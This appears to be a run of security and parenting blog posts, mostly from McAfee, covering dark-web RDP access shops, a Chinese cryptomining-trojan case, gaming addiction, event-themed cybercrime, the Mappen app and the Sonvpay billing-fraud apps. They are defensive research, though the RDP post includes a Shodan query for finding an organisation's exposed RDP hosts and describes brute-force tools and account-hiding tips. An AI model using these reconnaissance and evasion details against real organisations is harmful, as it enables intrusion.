So, what happens if your information was potentially compromised in the sale of one of these systems on the dark web? To protect your personal data from larger cybercriminal schemes that originate from RDP shops, be sure to follow these tips: 

  • Be selective about what you share. The best way to control where your information goes is by reducing the sources you share it with. That means not providing your personal information to every app, network, or system that asks for it. Be strict and diligent, and only provide something with information when it’s crucial to the service or experience it provides.
  • Set up an alert. Compromised information could potentially include financial data. Therefore, it’s best to proactively place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Invest in an identity theft monitoring and recovery solution. If enough personal data becomes compromised by cybercriminals accessing stolen systems, users could be potentially faced with the possibility of identity theft. That’s precisely why they should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Major International Airport’s Security System Found for Sale on Dark Web RDP Shop appeared first on McAfee Blogs.

Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks

Thanks to my colleague Christiaan Beek for his advice and contributions.

While researching underground hacker marketplaces, the McAfee Advanced Threat Research team has discovered that access linked to security and building automation systems of a major international airport could be bought for only US$10.

The dark web contains RDP shops, online platforms selling remote desktop protocol (RDP) access to hacked machines, from which one can buy logins to computer systems to potentially cripple cities and bring down major companies.

RDP, a proprietary protocol developed by Microsoft that allows a user to access another computer through a graphical interface, is a powerful tool for systems administrators. In the wrong hands, RDP can be used to devastating effect. The recent SamSam ransomware attacks on several American institutions demonstrate how RDP access serves as an entry point. Attacking a high-value network can be as easy and cheap as going underground and making a simple purchase. Cybercriminals like the SamSam group only have to spend an initial $10 dollars to get access and are charging $40K ransom for decryption, not a bad return on investment.

A screenshot of Blackpass.bz, one of the most popular RDP-shops, largely due to the variety of services offered.

Shops explained

Security maven Brian Krebs wrote the article “Really Dumb Passwords” in 2013. That short phrase encapsulates the vulnerability of RDP systems. Attackers simply scan the Internet for systems that accept RDP connections and launch a brute-force attack with popular tools such as, Hydra, NLBrute or RDP Forcer to gain access. These tools combine password dictionaries with the vast number of credentials stolen in recent large data breaches. Five years later, RDP shops are even larger and easier to access.

The McAfee Advanced Threat Research team looked at several RDP shops, ranging in size from 15 to more than 40,000 RDP connections for sale at Ultimate Anonymity Service (UAS), a Russian business and the largest active shop we researched. We also looked at smaller shops found through forum searches and chats. During the course of our research we noticed that the size of the bigger shops varies from day to day with about 10%. The goal of our research was not to create a definitive list of RDP shops; rather, we sought a better understanding of the general modus operandi, products offered, and potential victims.

The number of compromised systems claimed to be available for sale by several RDP shops. A single compromised system can appear on more than one shop’s list.

RDP access by cybercriminals

How do cybercriminals (mis)use RDP access? RDP was designed to be an efficient way to access a network. By leveraging RDP, an attacker need not create a sophisticated phishing campaign, invest in malware obfuscation, use an exploit kit, or worry about antimalware defenses. Once attackers gain access, they are in the system. Scouring the criminal underground, we found the top uses of hacked RDP machines promoted by RDP shops.

False flags: Using RDP access to create misdirection is one of the most common applications. While preserving anonymity, an attacker can make it appear as if his illegal activity originates from the victim’s machine, effectively planting a false flag for investigators and security researchers. Attackers can plant this flag by compiling malicious code on the victim’s machine, purposely creating false debugging paths and changing compiler environment traces.

Spam: Just as spammers use giant botnets such as Necrus and Kelihos, RDP access is popular among a subset of spammers. Some of the systems we found for sale are actively promoted for mass-mailing campaigns, and almost all the shops offer a free blacklist check, to see if the systems were flagged by SpamHaus and other antispam organizations.

Account abuse, credential harvesting, and extortion: By accessing a system via RDP, attackers can obtain almost all data stored on a system. This information can be used for identity theft, account takeovers, credit card fraud, and extortion, etc.

Cryptomining: In the latest McAfee Labs Threats Report, we wrote about the increase in illegal cryptocurrency mining due to the rising market value of digital currencies. We found several criminal forums actively advertising Monero mining as a use for compromised RDP machines.

Monero mining via RDP advertised on a cybercriminal forum.

Ransomware: The large majority of ransomware is still spread by phishing emails and exploit kits. However, specialized criminal groups such as SamSam are known to use RDP to easily enter their victims’ networks almost undetected.

RDP shop overview

Systems for sale: The advertised systems ranged from Windows XP through Windows 10. Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around US $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.

Third-party resellers: When comparing “stock” among several RDP shops, we found that the same RDP machines were sold at different shops, indicating that these shops act as resellers.

Windows Embedded Standard: Windows Embedded Standard, now called Windows IOT, is used in a wide variety of systems that require a small footprint. These systems can range from thin clients to hotel kiosk systems, announcement boards, point-of-sale (POS) systems, and even parking meters among others.

Among the thousands of RDP-access systems offered, some configurations stood out. We found hundreds of identically configured Windows Embedded Standard machines for sale at UAS Shop and BlackPass; all these machines were in the Netherlands. This configuration was equipped with a 1-GHz VIA Eden processor. An open-source search of this configuration revealed that it is most commonly used in thin clients and some POS systems. The configurations are associated with several municipalities, housing associations, and health care institutions in the Netherlands.

Thin client and POS systems are often overlooked and not commonly updated, making them an ideal backdoor target for an attacker. Although these systems have a small physical footprint, the business impact of having such a system compromised should not be underestimated. As we’ve observed from previous breaching of retailers leveraging unpatched or vulnerable POS systems, the damage extends far beyond financial only, including customer perception and long-term brand reputation.  In regard to the current affected systems we discovered, McAfee has notified the identified victims and is working to learn further detail on why and how these identical Windows systems were compromised.

Government and health care institutions: We also came across multiple government systems being sold worldwide, including those linked to the United States, and dozens of connections linked to health care institutions, from hospitals and nursing homes to suppliers of medical equipment. In a March blog post, the Advanced Threat Research team showed the possible consequences of ill-secured medical data and what can happen when an attacker gains access to medical systems. It is very troublesome to see that RDP shops offer an easy way in.

Additional products for sale

Services offered by our researched RDP shops.

In addition to selling RDP, some of these shops offer a lively trade in social security numbers, credit card data, and logins to online shops. The second-largest RDP shop we researched, BlackPass, offered the widest variety of products. The most prolific of these brokers provide one-stop access to all the tools used to commit fraud: RDP access into computers, social security numbers and other integral data to set up loans or open bank accounts.

For legal and ethical reasons, we did not purchase any of the products offered. Therefore, we cannot determine the quality of the services.

RDP ransomware attack scenario

Is it possible to find a high-value victim using an RDP shop? The Advanced Threat Research team put this theory to the test. By leveraging the vast amounts of connections offered by the RDP shops, we were able to quickly identify a victim that fits the profile of a high-value target in the United States.

We found a newly posted (on April 16) Windows Server 2008 R2 Standard machine on the UAS Shop. According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system.

RDP access offered for sale.

UAS Shop hides the last two octets the of the IP addresses of the systems it offers for sale and charges a small fee for the complete address. (We did not pay for any services offered by UAS or any other shop.) To locate the system being sold, we used shodan.io to search for any open RDP ports at that specific organization using this query:

org:”City  XXX” port:”3389”

The results were far more alarming than we anticipated. The Shodan search narrowed 65,536 possible IPs to just three that matched our query. By obtaining a complete IP address we could now look up the WHOIS information, which revealed that all the addresses belonged to a major International airport. This is definitely not something you want to discover on a Russian underground RDP shop, but the story gets worse.

From bad to worse

Two of the IP addresses presented a screenshot of the accessible login screens.

A login screen that matches the configuration offered in the RDP shop.

A closer look at the screenshots shows that the Windows configuration (preceding screen) is identical to the system offered in the RDP shop. There are three user accounts available on this system, one of which is the administrator account. The names of the other accounts seemed unimportant at first but after performing several open-source searches we found that the accounts were associated with two companies specializing in airport security; one in security and building automation, the other in camera surveillance and video analytics. We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz.

The login screen of a second system on the same network.

Looking at the other login account (preceding screen), we saw it is part of the domain with a very specific abbreviation. We performed the same kind of search on the other login account and found the domain is most likely associated with the airport’s automated transit system, the passenger transport system that connects terminals. It is troublesome that a system with such significant public impact might be openly accessible from the Internet.

Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack.

Anonymization

To publish our findings, we have anonymized the data to prevent any disclosure of sensitive security information.

Basic forensic and security advice

Playing hide and seek

Besides selling countless connections, RDP shops offer tips on how to remain undetected when an attacker wants to use the freshly bought RDP access.

This screen from the UAS Shop’s FAQ section explains how to add several registry keys to hide user accounts.

The UAS Shop offers a zip file with a patch to allow multiuser RDP access, although it is not possible by default on some Windows versions. The zip file contains two .reg files that alter the Windows registry and a patch file that alters termsvrl.dll to allow concurrent remote desktop connections.

These alterations to the registry and files leave obvious traces on a system. Those indicators can be helpful when investigating misuse of RDP access.

In addition to checking for these signs, it is good practice to check the Windows event and security logs for unusual logon types and RDP use. The following screen, from the well-known SANS Digital Forensics and Incident Response poster, explains where the logs can be found.


Source: SANS DFIR Poster 2015.

Basic RDP security measures

Outside access to a network can be necessary, but it always comes with risk. We have summarized some basic RDP security measures:

  • Using complex passwords and two-factor authentication will make brute-force RDP attacks harder to succeed
  • Do not allow RDP connections over the open Internet
  • Lock out users and block or timeout IPs that have too many failed login attempts
  • Regularly check event logs for unusual login attempts
  • Consider using an account-naming convention that does not reveal organizational information
  • Enumerate all systems on the network and list how they are connected and through which protocols. This also applies for Internet of Things and POS systems.

Conclusion

Remotely accessing systems is essential for system administrators to perform their duties. Yet they must take the time to set up remote access in a way that is secure and not easily exploitable. RPD shops are stockpiling addresses of vulnerable machines and have reduced the effort of selecting victims by hackers to a simple online purchase.

Governments and organizations spend billions of dollars every year to secure the computer systems we trust. But even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock. Just as we check the doors and windows when we leave our homes, organizations must regularly check which services are accessible from the outside and how they are secured. Protecting systems requires an integrated approach of defense in depth and proactive attitudes from every employee.

The post Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks appeared first on McAfee Blogs.

Chinese arrest 20 in major Crypto Currency Mining scam

According to Chinese-language publication Legal Daily police in two districts of China have arrested 20 people for their roles in a major crypto currency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company ( 大连昇平网络科技有限 ) that was designed to steal three types of coins.  Digibyte Coins (DGB, currently valued at USD$0.03 each),  Siacoin (SC, currently valued at $0.01 each) and DeCred coins (DCR coins, currently valued at $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

The investigation began when Tencent detected the presence of a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."  
Tencent referred the case to the Wei'an Municipal Public Security Bureau, who handled the case extremely well.  As they learned more about the trojans, they identified first the social media groups and forums where the trojan was being spread, and traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Mobao participated as a forum moderator on a site called the "Tianxia Internet Bar Forum" and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.
Mobao was popularizing the cheat program by encouraging others to make suggestions for new functionality.  The users who were using the tool did not suspect that they were actually mining crypto-currency while using the cheat.  More than 30,000 victims were using his cheat software and secretly mining crypto-currency for him.
Yang Mobao had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes.  He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining.  It turns out that these cards ALSO were trojaned!  As a major customer of Dalian Yuping, Moubao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked management Internet cafes.  After experiencing some profit from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province.  The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in video cafes.  The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans.  In addition to the illegal advertising software embedded in those 3.89 million video cards, their crypto currency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou.  Chen Mou could then cash them out at any time in the future.
 16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems.  Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by Reporter Xy Peng and correspondent Liu Guizeng Wang Yen.) (记者 徐鹏 通讯员 刘贵增 王艳)

Report: Gaming Addiction is a Real Thing. So What Can Parents Do Next?

It’s one of my biggest parenting regrets to date: About a decade ago, I failed to put limits around my teen’s passion for playing video games. He loved them, and I let him.

I convinced myself that my son’s video gaming provided him with an instant community where he daily climbed to the top of the scoreboard. A personal, consistent win for my first-born, more quiet child, right?

Looking back, I lied to myself at crucial moments along the way. I minimized his growing obsession by calling it a hobby. As he grew more engaged with gaming, he became more distant from our family. I ignored the fact that he was acquiring friends I didn’t know and forfeiting time outdoors for his preferred virtual landscape.

When our relationship hit several rough patches in later years, I failed to connect that friction back to his topheavy gaming habits. All the while, as a mom, I knew deep down (in my mom “knower”) I could have — should have — done more to limit his gaming.

New Findings

Not surprising, the World Health Organization (WHO) just recently classified a new form of addiction called “gaming disorder.” That designation means health professionals can now treat dangerous levels of video gaming as a legitimate addiction.

Thankfully, my son’s one-time excessive gaming didn’t reach the addiction level even though it was serious enough to negatively impact our family dynamic.

I can’t go back. However, if there’s a parent who can learn from my heartache in this area, I hope this post might help.

The Upside

We know gaming isn’t the enemy. In fact, gaming has been credited with helping kids overcome depression, anxiety, and social insecurities. Gaming is also blowing open new doors in education as we understand how today’s digital learners (many of whom are gamers) consume information and find solutions. We know gaming skills are helping build tomorrow’s cybersecurity experts, app developers, programmers, military strategists, surgeons, and leaders.

With the benefits understood, balance is the magic word when it comes to the healthy use of any technology we welcome into our homes.

Definition

The WHO’s official definition of “gaming disorder” includes:

  • A pattern of behavior for at least 12 months in which gaming is out of control.
  • The pattern of behavior must show an “increased priority given to gaming” to the point that gaming “takes precedence over other interests and daily activities.”
  • A “continuation or escalation of gaming despite the occurrence of negative consequences,” or behavior that affects one’s relationships, education, or occupation.

So what can you do if you recognize even one of the warning signs above? Plenty. It’s never too late to make changes in your family. All you need is knowledge, action, and some mad follow-through skills.

5 Ways to Help Kids Balance Gaming

Set and enforce time limits. Start setting technology time limits when your kids are young. If your kids are older, don’t shy away from announcing new house rules starting today. Yes, kids may complain, but experts agree: Rules help kids feel loved and safe. Parental control software will help you set time limits on your child’s device usage and help minimize exposure to potentially malicious or inappropriate websites. Another tip: Set a timer on your smartphone or go old school and crank up that kitchen timer. Take it from this regret-filled mom: Time limits will make every difference in helping kids find balance.

Be a role model. You can’t tell your kids they have to get off of Call of Duty then spend the next eight hours constructing high-scoring word combos on Words with Friends. Model smart tech use and moderation. Even place that kitchen timer next to you if you need it.

Roll up your sleeves — get gaming. Jump into the game with your kids so you can better understand the content, the community, and the messages coming into your home. Get a glimpse into the appeal of the game for your child and the skills needed to advance. Once you have this perspective, you will intuitively know how to monitor your child’s time on specific games. This is also a great opportunity to share your values on certain topics or narratives addressed in games.

Stay safe while gaming. Gaming’s purpose is fun, so it’s rare that a child or even a parent is focused too much on safety when kids log on to play. Still, there are safety risks. A recent McAfee survey found that parents are concerned with issues connected to gaming such as sexual predators, data risks, inappropriate content, and bullying, but few take steps to remedy those concerns. Several products such as McAfee Total Protection can help keep connected devices safe from malware and McAfee WebAdvisor can help you avoid dangerous websites and links.

Don’t overreact. It’s easy to fear what we don’t understand. True video game addiction is rare. The WHO’s new classification isn’t describing the average gamer who spends a few of hours a day gaming with friends. The designation targets serious gaming habits that destroy people’s lives such as neglecting hygiene and nutrition, rejecting loved ones, staying up all night, and losing jobs due to gaming. The more you understand about your child’s favorite games, the better parenting decisions you will be able to make.

toni page birdsong

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Report: Gaming Addiction is a Real Thing. So What Can Parents Do Next? appeared first on McAfee Blogs.

Cybercrime in the Spotlight: How Crooks Capitalize on Cultural Events

Every four years, everyone’s head around the globe turns toward the television. The Olympics, the World Cup – world events like these have all eyes viewing friendly competition between nations. Operating under such a big spotlight, these events have been heavily guarded by physical security to ensure no participants or attendees are harmed. But what about digital security? In 2018, many aspects of these events have become digitized, which is great for event organizers and viewers, but also for cybercriminals. In fact, reports are already circulating that hackers are targeting attendees of this year’s 2018 FIFA World Cup.

Why These Events?

The cultural value placed in these international games is precisely the reason cybercriminals target them. The more something is valued, the more people are willing to make sacrifices for it. Cybercriminals know that, and hope to capitalize on it.

In cases like the World Cup, fans may be willing to expose themselves to a more hostile environment in order to feel a part of the event. The same goes for companies that are associated with the sporting events, as they can fall victims to attacks just as individuals do.

Types of Attacks

Both innocent tourists and fans at home may have to deal with threats that result from their involvement in these events. Given the fact that internet access has increased all over the world, many tourists are vulnerable to rogue access-point attacks in public places. Attackers can use these points to harvest credentials and gain access to a victim’s device and accounts. Malware can also be placed within ATM machines, ready to rip off tourists withdrawing currency from their banks. As for fans at home, many phishing and waterhole attacks have been designed around these events to entice fans to visit malicious sites or open emails that appear to be related to the games.

However, for nation-state attacks, a lot of groundwork is done before these global events even begin. Our McAfee Labs team saw this firsthand in the period leading up to the Pyeongchang 2018 Olympic Winter Games. A nation-state hacker pretended to be a supplier to the Olympics and sent out weaponized mail to organizations of interest that contained malware developed well before the event had started.

The Implications

Whether the objective behind the threat is disruption or financial gain, these attacks all do have one thing in common — they impact the overall feeling of safety at these events and take away from what is supposed to feel like a worldwide celebration of sport.

Now, when fans wish to part of a big event such as the World Cup, they can no longer just focus on which jersey they’re wearing that day. They have to worry about their bank accounts being robbed or becoming extorted. Beyond the individual implications, the nation-state attacks that take place at these events can rear their head in an ugly way, as they can actually worsen international relations much more than a healthy sporting rivalry ever could.

So the question is – now what? On an individual level, visitors to these events must maintain overall good digital security hygiene. This means leaving unnecessary devices at home, enabling two-factor authentication, using a VPN service, and overall remaining alert and vigilant for scams.

Beyond that, we must all recognize that our physical and digital lives are converging at a fast pace, and we now have a large digital attack surface that is not yet properly safeguarded. And with both cybercriminals and nation-state actors showing such a heightened interest in global cultural events, cybersecurity must become an essential part of organizing such an event. Only then can countries host a successful and safe sporting event for everyone.

To learn more about what McAfee is doing to help face the threats to these events, be sure to follow us at @McAfee and @McAfee_Labs.

The post Cybercrime in the Spotlight: How Crooks Capitalize on Cultural Events appeared first on McAfee Blogs.

What Parents Need to Know About the Popular App Mappen

Kids love their apps but in their excitement to download the new ones, app safety often falls straight off their radar. One of those new, fun, not-so-safe apps is Mappen.

Kids, pre-teens specifically, are jumping on Mappen to connect with friends nearby and, as the app’s tagline encourages, “Make Things Happen.” The location-based app allows friends to see each other’s location, what they are doing, and make it easy to meet up. Sounds like fun except for the fact that the app is brimming with potential security flaws.

How It Works

Anyone who downloads the Mappen app can send a friend request to anyone else and begin sharing his or her location (and data) immediately. While on Mappen, friends can share updates and photos much like any other social network. Personal data that can be shared: names, birthdates, location, likes, dislikes, photos, and friend lists.

Once a user installs the app (icon, right), he or she is asked to turn on location services that must remain on to share location, see others, and post content updates. The app also asks to access a user’s full contact list before it can be used.

The Risks

While many location-based apps exist now, Mappen specifically targets tweens. Mappen’s privacy policy states clearly that it collects and shares data, which presents a privacy risk to minors who use the app.

Likewise, the location requirement to use the app poses a safety risk. This feature means anyone on your child’s friend list can see your child’s location at any time. As your child’s Mappen circle grows, so too might the chance of your child sharing his or her location and personal information with an unsafe “friend.”

Tips to Help Boost App Safety

Stay connected with your kids. The greatest risk to your child’s online safety is a strained relationship. Every family dynamic and circumstance varies, but consider doing all you can to make your relationship with your child a priority. When communication and trust are strong with your child, you will better know what’s going on in his or her life, whom their friends are, and if there’s a situation in which they might need help.

Monitor apps! The best way to know which apps your kids use and how they use them is to routinely monitor their phones. How do you do this? You do this physically and with technology. About once a week, look at your child’s phone and laptop or tablet (preferably with your son or daughter next to you), look at the display screen, examine the app icons, and ask questions. If you don’t recognize an app, click it open, or ask questions. Also, if there’s an app icon you click that asks for a password, it may be a vault app that requires a few more clicks or a conversation. Another way to monitor apps is using technology such as filtering software that will help you filter and track the content that comes into your home via your child’s devices.

Do your research, stay aware. Stay on top of trends in apps by reading this and other technology or family blogs. New apps come out all the time, and word-of-mouth among teens quickly spreads. One of the best ways to keep your kids safe online is to understand where they connect online and what risks those digital spaces may present. Potential risks to be aware of that some apps may carry potential privacy infringements, cyberbullying, pornography, phishing scams, malware, predators, and sex-related crimes.

Turn off location. Mappen, as well as other apps such as Facebook, Kik, and Snapchat, access a user’s location while using the app and even when the app is not in use. To ensure your location isn’t shared randomly, turn off location when apps are not in use. Depending on the age of your child, you may consider not allowing the use of location-based apps at all.

Say NO to random friend requests. It’s easy for criminals to create a fake profile and gain access into your child’s life. An attractive peer from a nearby town who wants to “connect” may be a catfish using another person’s identity or a predator looking to groom a vulnerable tween or teen.

Guard your child’s privacy. When your child shares personal information through an unsafe app, it opens up them up, and it opens up your entire family to risk. Often kids get comfortable online and forget — or don’t fully understand — the problem with sharing personal details. Review the importance of keeping details such as full name, school, birthdates, address, personal photos, and other family information private.

The post What Parents Need to Know About the Popular App Mappen appeared first on McAfee Blogs.

AsiaHitGroup Returns With New Billing-Fraud Campaign

Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app was one of them—downloaded 50,000 times from the official app store—that were designed to steal money from their victims. The AsiaHitGroup Gang has been active since at least 2016, attempting to charge 20,000 victims for the download of popular mobile applications containing the fake-installer app Sonvpay.A. For more analysis, see the Mobile Research team’s post.

Ordinarily we advise users to review the requested permissions before installing a mobile app, and normally this is enough. In this case, the only permission requested was access to SMS messages, and once installed the app behaved as expected. In the background, however, Sonvpay silently used the push notification service to subscribe users to premium-rate services.

This campaign displays a significant level of customization. The criminals can tailor their fraud to the country of their choosing. In our analysis we looked at mobile billing fraud targeting users in Kazakhstan, Malaysia, and Russia. In Kazakhstan victims are subscribed to a premium-rate service whereas in Malaysia and Russia they are connected to a WAP billing service. Further, the criminals recognize that in Malaysia the mobile operator sends a PIN code, so the attackers include functionality to intercept the SMS. Once intercepted, the app communicates with the mobile operator to subscribe to the service.

This group began targeting users in Asia, but the move to Russia shows its increasing ambition. The goal of the AsiaHitGroup Gang remains the same, but the manner in which they attempt to achieve their ends differs per campaign, and their techniques are improving. Although the security industry focuses much attention on “loud” and destructive attacks, many campaigns quietly steal funds from unsuspecting victims or those who have little visibility into what is happening.

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play

The McAfee Mobile Research team has found a new billing-fraud campaign of at least 15 apps published in 2018 on Google Play. Toll fraud (which includes WAP billing fraud) is a leading category of potentially harmful apps on Google Play, according to the report Android Security 2017 Year in Review. This new campaign demonstrates that cybercriminals keep finding new ways to steal money from victims using apps on official stores such as Google Play.

The AsiaHitGroup Gang has been active since at least late 2016 with the distribution of the fake-installer applications Sonvpay.A, which attempted to charge at least 20,000 victims from primarily Thailand and Malaysia for the download of copies of popular applications. One year later, in November 2017, a new campaign was discovered on Google Play, Sonvpay.B, used IP address geolocation to confirm the country of the victim and added Russian victims to the WAP billing fraud to increase its potential to steal money from unsuspected users.

In January 2018, the AsiaHitGroup Gang returned to Google Play with the repackaged app, Sonvpay.C, which uses silent background push notifications to trigger a fake update dialog. When victims start the “update” they instead subscribe to a premium-rate service. The subscription operates primarily via WAP billing, which does not require sending SMS messages to premium-rate numbers. Instead it requires only that users employ the mobile network to access a specific website and automatically click on a button to initiate the subscription process. Based on the approximate number of installations from Google Play, the cost of the premium-service subscription, and the days that these apps were available, we estimate that the AsiaHitGroup Gang could have potentially earned between $60,500–$145,000 since January.

Sonvpay on Google Play

The McAfee Mobile Research team initially found the following applications repackaged with Sonvpay on Google Play, all of them published this year:

Figure 1. Sonvpay apps found on Google Play.

We notified Google about these apps on April 10 and they were promptly removed. A couple of days later the app “Despacito for Ringtone” was found again on the store and was quickly removed. In total we found 15 apps that were installed at least 50,000 times since the first one, Cut Ringtones 2018, was released on Google Play in January 2018. The following table lists the 15 malicious apps:

At the time of download, the only red flag that a user could notice is that the app needs access to SMS messages. Once installed and executed, the app behaves as expected (QR code reader, ring tones, etc.). However, in the background and without the user’s knowledge, Sonvpay listens for incoming push notifications that contain the data to perform mobile billing fraud.

Background Push Notification and Fake Update Screen

Sonvpay employs the onesignal push notification service to get the information to subscribe users to premium-rate services. To receive the data in the background without displaying a notification, Sonvpay implements the method “onNotificationProcessing” and returns “true” to make the notification silent:

Figure 2. Silent background notification.

The received data can perform WAP and SMS fraud along with information necessary to display a fake update notification to the user after some time of using the repackaged application. This fake notification has only one bogus button. If the user scrolls until the end, the misleading phrase “Click Skip is to agree” appears:

Figure 3. Fake update notification.

If the user clicks the only button, Sonvpay will do its job. However, even if there is no interaction with this window and the data in the push notification has the value “price” as empty, Sonvpay will proceed to subscribe to a premium-rate service:

Figure 4. Starting mobile billing fraud if “price” value is empty.

Downloading the Dynamic Payload from a Remote Server

One of the parameters obtained from the silent push notification is a URL to request the location of functionality to perform mobile billing fraud. Once the fake update notification is displayed, Sonvpay requests the download of the library from another remote server:

Figure 5. Sonvpay requesting library with additional functionality.

The new APK file is downloaded and stored in the path /sdcard/Android/<package_name>/cache/ so that it can be dynamically loaded and executed at runtime. The library we obtained for performing mobile billing fraud targeted only Kazakhstan and Malaysia but, because the library is present in a remote server and can be dynamically loaded, it can likely be updated at any time to target more countries or mobile operators.

WAP Billing and SMS Fraud

In the case of Kazakhstan, Sonvpay loads a specific URL delivered through the silent push notification and uses JavaScript to click on a button and on the element “activate” to fraudulently subscribe the user to a premium-rate service:

Figure 6. WAP billing fraud in Kazakhstan.

For Malaysia, the malware creates a new WebView to send the “Shortcode” and “Keyword” parameters to a specific URL to subscribe the user to a WAP billing service:

Figure 7. WAP billing fraud in Malaysia.

However, for Malaysia the app needs to intercept a confirmation code (PIN) sent by the mobile operator via SMS. Sonvpay has this SMS interception functionality implemented in the original repackaged application:

Figure 8. Processing an intercepted SMS message to get the confirmation PIN.

Once the PIN is obtained, it is sent to the mobile operator via a web request to automatically confirm the subscription. If the parameters for Kazakhstan or Malaysia do not match, Sonvpay still tries to perform mobile billing fraud by attempting to send an SMS message to a premium-rate number provided via the silent push notification:

Figure 9. Functionality to send an SMS message to a premium-rate number.

Closer Look to Previous Campaigns

While looking for patterns in the 2018 campaign, we found the app DJ Mixer–Music Mixer. As soon as this application executes, it checks if the device has an Internet connection. If the device is offline, the app shows the error message “You connect to internet to continue” and ends its execution. If the device is online, the app executes a web request to a specific URL:

Figure 10. Web request to the AsiaHitGroup Gang URL.

We learned the apps created by the developer SHINY Team 2017 were available on Google Play in September 2017; earlier Sonvpay variants were discovered in November 2017. The primary behavior of the two variants is almost the same—including the changing of the main icon and the app’s name to Download Manager to hide its presence from the user. However, with DJ Mixer, the geolocation of the IP address identifies the country of the infected device and aids the execution of the mobile billing fraud:

Figure 11. Using IP geolocation to target specific countries.

In this case only three countries are targeted via the geolocation service: Russia (RU), Thailand (TH), and Malaysia (MY). If the IP address of the infected devices is not from any of these countries, a dialog will claim the app is not active and that the user needs to uninstall and update to the latest version.

If the country is Thailand or Malaysia, the malicious app randomly selects a keyword to select an image to offer users premium-rate services. With Malaysia the image includes English text with terms of service and the button “Subscribe” to accept the randomly selected premium-rate service:

Figure 12. Screens displayed when the country of the IP address is Malaysia.

In the case of Thailand, the text is in Thai and includes a small version of terms of service along with instructions to unsubscribe and stop the charges:

Figure 13. Screens shown when the country of the IP address is Thailand.

Finally, with Russia no image is shown to the user. The app fraudulently charges the user via WAP billing while enabling 3G and disabling Wi-Fi:

Figure 14. Forcing the use of 3G to start WAP billing fraud.

We also found similar apps from late 2016 that performed SMS fraud by pretending to be legitimate popular applications and asking the user to pay for them. These are similar to text seen in the 2018 campaign as an update but labeled as Term of user:

Figure 15. Fake-installer behavior asking the user to pay for a popular legitimate app.

If the user clicks “No,” the app executes as expected. However, if the user clicks “Yes,” the app subscribes the user to a premium-rate service by sending an SMS message with a specific keyword to a short number. Next the mobile operator sends the device a PIN via SMS; the malware intercepts the PIN and returns it via web request to confirm the subscription.

Once the user is fraudulently subscribed to a premium-rate service to download a copy of a free app on official app stores, the malware shows the dialog “Downloading game…” and proceeds with the download of another APK stored on a third-party server. Although the APK file that we downloaded from the remote server is a copy of the legitimate popular app, the file can be changed at any point to deliver additional malware.

Unlike in previous campaigns, we did not find evidence that these fake-installer apps were distributed via Google Play. We believe that they were distributed via fake third-party markets from which users looking for popular apps are tricked into downloading APK files from unknown sources.  In June 2018 ESET and Sophos found a new version of this variant pretending to be the popular game Fortnite. The fake game was distributed via a YouTube video by asking the user to download the fake app from a specific URL. This recent campaign shows that the cybercriminals behind this threat are still active tricking users into installing these fake applications.

Connections Among Campaigns

All of these campaigns rely on billing-fraud apps targeting users in Southeast and Central Asia and offer some similarities in behavior such as the use of almost the same text and images to trick users into subscribing to premium-rate services. Other potential connections among the three campaigns suggest that all the apps are likely from the same actor group. For example, apps from all campaigns use the same string as debug log tag:

Figure 16. The “SonLv” string used as a log tag occurs in all campaigns.

There is also a notable similarity in package and classes names and in the use of a common framework (telpoo.frame) to perform typical tasks such as database, networking, and interface support:

Figure 17. Common package and classes names in all campaigns.

